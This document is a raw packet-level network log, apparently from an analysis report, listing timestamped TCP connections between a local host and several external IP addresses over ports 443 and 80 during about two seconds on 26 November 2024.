Nov 26, 2024 00:25:38.190344095 CET	443	49816	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:38.205637932 CET	443	49797	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:38.205728054 CET	443	49797	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:38.205800056 CET	49797	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:38.219784975 CET	49797	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:38.219784975 CET	49797	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:38.219800949 CET	443	49797	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:38.219810009 CET	443	49797	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:38.224356890 CET	49817	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:38.224390984 CET	443	49817	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:38.224442959 CET	49817	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:38.224834919 CET	49817	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:38.224849939 CET	443	49817	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:38.234402895 CET	49805	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:38.234642982 CET	49802	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:38.260354042 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:38.307853937 CET	49801	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:38.381627083 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:38.423069000 CET	49819	443	192.168.2.6	2.16.158.169
Nov 26, 2024 00:25:38.423124075 CET	443	49819	2.16.158.169	192.168.2.6
Nov 26, 2024 00:25:38.423192024 CET	49819	443	192.168.2.6	2.16.158.169
Nov 26, 2024 00:25:38.426590919 CET	49819	443	192.168.2.6	2.16.158.169
Nov 26, 2024 00:25:38.426603079 CET	443	49819	2.16.158.169	192.168.2.6
Nov 26, 2024 00:25:38.456862926 CET	443	49800	20.198.119.143	192.168.2.6
Nov 26, 2024 00:25:38.456934929 CET	49800	443	192.168.2.6	20.198.119.143
Nov 26, 2024 00:25:38.459471941 CET	49800	443	192.168.2.6	20.198.119.143
Nov 26, 2024 00:25:38.459479094 CET	443	49800	20.198.119.143	192.168.2.6
Nov 26, 2024 00:25:38.459717035 CET	443	49800	20.198.119.143	192.168.2.6
Nov 26, 2024 00:25:38.463963985 CET	49800	443	192.168.2.6	20.198.119.143
Nov 26, 2024 00:25:38.464030981 CET	49800	443	192.168.2.6	20.198.119.143
Nov 26, 2024 00:25:38.464035034 CET	443	49800	20.198.119.143	192.168.2.6
Nov 26, 2024 00:25:38.464188099 CET	49800	443	192.168.2.6	20.198.119.143
Nov 26, 2024 00:25:38.473356009 CET	49827	443	192.168.2.6	18.165.220.110
Nov 26, 2024 00:25:38.473385096 CET	443	49827	18.165.220.110	192.168.2.6
Nov 26, 2024 00:25:38.473434925 CET	49827	443	192.168.2.6	18.165.220.110
Nov 26, 2024 00:25:38.475344896 CET	49827	443	192.168.2.6	18.165.220.110
Nov 26, 2024 00:25:38.475359917 CET	443	49827	18.165.220.110	192.168.2.6
Nov 26, 2024 00:25:38.476859093 CET	443	49805	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:38.476922035 CET	443	49805	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:38.476965904 CET	49805	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:38.477603912 CET	49805	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:38.477621078 CET	443	49805	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:38.480751038 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:38.484538078 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:38.484580994 CET	49798	443	192.168.2.6	172.217.19.225
Nov 26, 2024 00:25:38.484591007 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:38.495958090 CET	443	49802	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:38.496049881 CET	443	49802	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:38.496073008 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:38.496097088 CET	49802	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:38.496117115 CET	49798	443	192.168.2.6	172.217.19.225
Nov 26, 2024 00:25:38.496126890 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:38.496270895 CET	49802	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:38.496284008 CET	443	49802	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:38.505675077 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:38.505723953 CET	49798	443	192.168.2.6	172.217.19.225
Nov 26, 2024 00:25:38.505733013 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:38.507340908 CET	443	49800	20.198.119.143	192.168.2.6
Nov 26, 2024 00:25:38.518479109 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:38.518533945 CET	49798	443	192.168.2.6	172.217.19.225
Nov 26, 2024 00:25:38.518542051 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:38.532326937 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:38.532397985 CET	49798	443	192.168.2.6	172.217.19.225
Nov 26, 2024 00:25:38.532406092 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:38.545743942 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:38.545788050 CET	49798	443	192.168.2.6	172.217.19.225
Nov 26, 2024 00:25:38.545795918 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:38.579046011 CET	443	49801	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:38.579117060 CET	443	49801	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:38.579168081 CET	49801	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:38.579305887 CET	49801	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:38.579325914 CET	443	49801	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:38.586860895 CET	49798	443	192.168.2.6	172.217.19.225
Nov 26, 2024 00:25:38.601906061 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:38.606156111 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:38.606213093 CET	49798	443	192.168.2.6	172.217.19.225
Nov 26, 2024 00:25:38.606234074 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:38.649519920 CET	443	49785	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:38.657658100 CET	49785	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:38.657682896 CET	443	49785	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:38.658221960 CET	49785	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:38.658232927 CET	443	49785	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:38.688321114 CET	49798	443	192.168.2.6	172.217.19.225
Nov 26, 2024 00:25:38.688332081 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:38.694189072 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:38.694237947 CET	49798	443	192.168.2.6	172.217.19.225
Nov 26, 2024 00:25:38.694247961 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:38.702883005 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:38.702928066 CET	49798	443	192.168.2.6	172.217.19.225
Nov 26, 2024 00:25:38.702935934 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:38.708640099 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:38.708688974 CET	49798	443	192.168.2.6	172.217.19.225
Nov 26, 2024 00:25:38.708697081 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:38.715935946 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:38.715982914 CET	49798	443	192.168.2.6	172.217.19.225
Nov 26, 2024 00:25:38.715991974 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:38.727777958 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:38.727817059 CET	49798	443	192.168.2.6	172.217.19.225
Nov 26, 2024 00:25:38.727826118 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:38.733387947 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:38.733437061 CET	49798	443	192.168.2.6	172.217.19.225
Nov 26, 2024 00:25:38.733445883 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:38.745018959 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:38.745066881 CET	49798	443	192.168.2.6	172.217.19.225
Nov 26, 2024 00:25:38.745074034 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:38.758693933 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:38.758744955 CET	49798	443	192.168.2.6	172.217.19.225
Nov 26, 2024 00:25:38.758752108 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:38.772336006 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:38.772383928 CET	49798	443	192.168.2.6	172.217.19.225
Nov 26, 2024 00:25:38.772392035 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:38.785145998 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:38.785197020 CET	49798	443	192.168.2.6	172.217.19.225
Nov 26, 2024 00:25:38.785203934 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:38.796927929 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:38.796999931 CET	49798	443	192.168.2.6	172.217.19.225
Nov 26, 2024 00:25:38.797008991 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:38.808778048 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:38.808828115 CET	49798	443	192.168.2.6	172.217.19.225
Nov 26, 2024 00:25:38.808835030 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:38.820704937 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:38.820768118 CET	49798	443	192.168.2.6	172.217.19.225
Nov 26, 2024 00:25:38.820775986 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:38.822490931 CET	443	49813	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:38.822696924 CET	49813	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:38.822716951 CET	443	49813	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:38.822901964 CET	443	49814	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:38.823079109 CET	49814	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:38.823092937 CET	443	49814	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:38.823604107 CET	443	49813	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:38.823656082 CET	49813	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:38.823940992 CET	49813	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:38.823998928 CET	443	49813	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:38.824209929 CET	443	49814	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:38.824264050 CET	49814	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:38.824570894 CET	49814	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:38.824647903 CET	443	49814	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:38.824685097 CET	49814	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:38.832391977 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:38.832444906 CET	49798	443	192.168.2.6	172.217.19.225
Nov 26, 2024 00:25:38.832452059 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:38.840966940 CET	443	49812	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:38.841193914 CET	49812	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:38.841206074 CET	443	49812	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:38.842195988 CET	443	49812	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:38.842264891 CET	49812	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:38.842591047 CET	49812	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:38.842658997 CET	443	49812	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:38.842747927 CET	49812	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:38.842756987 CET	443	49812	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:38.859697104 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:38.859765053 CET	49798	443	192.168.2.6	172.217.19.225
Nov 26, 2024 00:25:38.859772921 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:38.860532999 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:38.860586882 CET	49798	443	192.168.2.6	172.217.19.225
Nov 26, 2024 00:25:38.860594988 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:38.867341042 CET	443	49814	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:38.882751942 CET	49829	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:38.882790089 CET	443	49829	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:38.882843971 CET	49813	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:38.882858038 CET	443	49813	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:38.882879019 CET	49829	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:38.883135080 CET	49829	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:38.883146048 CET	443	49829	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:38.901041031 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:38.901084900 CET	49798	443	192.168.2.6	172.217.19.225
Nov 26, 2024 00:25:38.901101112 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:38.901618958 CET	49814	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:38.901624918 CET	443	49814	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:38.901658058 CET	49812	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:38.902498960 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:38.902565002 CET	49798	443	192.168.2.6	172.217.19.225
Nov 26, 2024 00:25:38.902573109 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:38.909966946 CET	49814	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:38.910058022 CET	443	49814	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:38.910106897 CET	49814	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:38.910962105 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:38.911005974 CET	49798	443	192.168.2.6	172.217.19.225
Nov 26, 2024 00:25:38.911015987 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:38.915327072 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:38.915374041 CET	49798	443	192.168.2.6	172.217.19.225
Nov 26, 2024 00:25:38.915380955 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:38.919507980 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:38.919552088 CET	49798	443	192.168.2.6	172.217.19.225
Nov 26, 2024 00:25:38.919559002 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:38.923604965 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:38.923655033 CET	49798	443	192.168.2.6	172.217.19.225
Nov 26, 2024 00:25:38.923665047 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:38.927805901 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:38.927855015 CET	49798	443	192.168.2.6	172.217.19.225
Nov 26, 2024 00:25:38.927864075 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:38.931112051 CET	49813	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:38.931390047 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:38.931443930 CET	49798	443	192.168.2.6	172.217.19.225
Nov 26, 2024 00:25:38.931452036 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:38.937287092 CET	49813	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:38.937371969 CET	443	49813	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:38.937422037 CET	49813	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:38.937819958 CET	49829	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:38.938147068 CET	49827	443	192.168.2.6	18.165.220.110
Nov 26, 2024 00:25:38.938221931 CET	49799	443	192.168.2.6	2.16.158.41
Nov 26, 2024 00:25:38.938261986 CET	49819	443	192.168.2.6	2.16.158.169
Nov 26, 2024 00:25:38.939300060 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:38.939366102 CET	443	49799	2.16.158.41	192.168.2.6
Nov 26, 2024 00:25:38.939368963 CET	49798	443	192.168.2.6	172.217.19.225
Nov 26, 2024 00:25:38.939382076 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:38.939412117 CET	49799	443	192.168.2.6	2.16.158.41
Nov 26, 2024 00:25:38.940556049 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:38.940598965 CET	49798	443	192.168.2.6	172.217.19.225
Nov 26, 2024 00:25:38.940607071 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:38.944797039 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:38.944843054 CET	49798	443	192.168.2.6	172.217.19.225
Nov 26, 2024 00:25:38.944850922 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:38.952048063 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:38.952114105 CET	49798	443	192.168.2.6	172.217.19.225
Nov 26, 2024 00:25:38.952122927 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:38.959757090 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:38.959819078 CET	49798	443	192.168.2.6	172.217.19.225
Nov 26, 2024 00:25:38.959825993 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:38.979029894 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:38.979085922 CET	49798	443	192.168.2.6	172.217.19.225
Nov 26, 2024 00:25:38.979104996 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:38.979329109 CET	443	49827	18.165.220.110	192.168.2.6
Nov 26, 2024 00:25:38.979336023 CET	443	49819	2.16.158.169	192.168.2.6
Nov 26, 2024 00:25:38.980745077 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:38.980808020 CET	49798	443	192.168.2.6	172.217.19.225
Nov 26, 2024 00:25:38.980822086 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:38.983338118 CET	443	49829	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:38.993518114 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:38.993563890 CET	49798	443	192.168.2.6	172.217.19.225
Nov 26, 2024 00:25:38.993576050 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:39.005877972 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:39.005959034 CET	49798	443	192.168.2.6	172.217.19.225
Nov 26, 2024 00:25:39.005965948 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:39.017189026 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:39.017440081 CET	49798	443	192.168.2.6	172.217.19.225
Nov 26, 2024 00:25:39.017448902 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:39.024736881 CET	443	49796	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:39.025902033 CET	49796	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:39.025924921 CET	443	49796	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:39.026407957 CET	49796	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:39.026412964 CET	443	49796	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:39.028991938 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:39.029043913 CET	49798	443	192.168.2.6	172.217.19.225
Nov 26, 2024 00:25:39.029052019 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:39.030319929 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:39.030371904 CET	49798	443	192.168.2.6	172.217.19.225
Nov 26, 2024 00:25:39.030379057 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:39.032947063 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:39.032987118 CET	49798	443	192.168.2.6	172.217.19.225
Nov 26, 2024 00:25:39.032999039 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:39.033334970 CET	49812	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:39.033411026 CET	443	49812	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:39.033484936 CET	49812	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:39.040608883 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:39.040684938 CET	49798	443	192.168.2.6	172.217.19.225
Nov 26, 2024 00:25:39.040693045 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:39.041520119 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:39.041562080 CET	49798	443	192.168.2.6	172.217.19.225
Nov 26, 2024 00:25:39.041569948 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:39.065725088 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:39.065798044 CET	49798	443	192.168.2.6	172.217.19.225
Nov 26, 2024 00:25:39.065823078 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:39.066446066 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:39.066500902 CET	49798	443	192.168.2.6	172.217.19.225
Nov 26, 2024 00:25:39.066509962 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:39.070204973 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:39.070271969 CET	49798	443	192.168.2.6	172.217.19.225
Nov 26, 2024 00:25:39.070278883 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:39.071640968 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:39.071708918 CET	49798	443	192.168.2.6	172.217.19.225
Nov 26, 2024 00:25:39.071717024 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:39.072276115 CET	49798	443	192.168.2.6	172.217.19.225
Nov 26, 2024 00:25:39.072320938 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:39.072509050 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:39.072559118 CET	49798	443	192.168.2.6	172.217.19.225
Nov 26, 2024 00:25:39.072573900 CET	49798	443	192.168.2.6	172.217.19.225
Nov 26, 2024 00:25:39.103207111 CET	443	49785	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:39.103277922 CET	443	49785	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:39.103352070 CET	49785	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:39.105710983 CET	49785	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:39.105736971 CET	443	49785	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:39.105751038 CET	49785	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:39.105757952 CET	443	49785	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:39.109097004 CET	49830	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:39.109133005 CET	443	49830	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:39.109323978 CET	49830	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:39.109510899 CET	49830	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:39.109523058 CET	443	49830	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:39.140767097 CET	443	49800	20.198.119.143	192.168.2.6
Nov 26, 2024 00:25:39.140949011 CET	443	49800	20.198.119.143	192.168.2.6
Nov 26, 2024 00:25:39.141346931 CET	49800	443	192.168.2.6	20.198.119.143
Nov 26, 2024 00:25:39.141763926 CET	49800	443	192.168.2.6	20.198.119.143
Nov 26, 2024 00:25:39.141777992 CET	443	49800	20.198.119.143	192.168.2.6
Nov 26, 2024 00:25:39.141791105 CET	49800	443	192.168.2.6	20.198.119.143
Nov 26, 2024 00:25:39.207853079 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:39.207947969 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:39.254937887 CET	49831	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:39.254971027 CET	443	49831	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:39.255044937 CET	49831	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:39.255348921 CET	49832	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:39.255377054 CET	443	49832	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:39.255445957 CET	49832	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:39.255652905 CET	49833	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:39.255686045 CET	443	49833	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:39.256031990 CET	49833	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:39.256469965 CET	49834	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:39.256478071 CET	443	49834	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:39.256661892 CET	49831	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:39.256669998 CET	443	49831	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:39.256721973 CET	49834	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:39.256989956 CET	49832	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:39.257004976 CET	443	49832	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:39.257116079 CET	49833	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:39.257134914 CET	443	49833	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:39.257323980 CET	49834	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:39.257332087 CET	443	49834	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:39.414693117 CET	49835	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:39.414722919 CET	443	49835	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:39.414972067 CET	49835	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:39.420711040 CET	49836	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:39.420738935 CET	443	49836	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:39.420886993 CET	49836	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:39.421178102 CET	49835	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:39.421196938 CET	443	49835	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:39.421457052 CET	49836	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:39.421473026 CET	443	49836	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:39.974767923 CET	443	49815	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:39.976811886 CET	443	49816	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:39.977292061 CET	49815	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:39.977303982 CET	443	49815	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:39.978096008 CET	49815	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:39.978102922 CET	443	49815	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:39.978367090 CET	49816	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:39.978387117 CET	443	49816	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:39.978754997 CET	49816	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:39.978764057 CET	443	49816	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:40.005795002 CET	443	49819	2.16.158.169	192.168.2.6
Nov 26, 2024 00:25:40.005860090 CET	49819	443	192.168.2.6	2.16.158.169
Nov 26, 2024 00:25:40.006572962 CET	49841	443	192.168.2.6	152.195.19.97
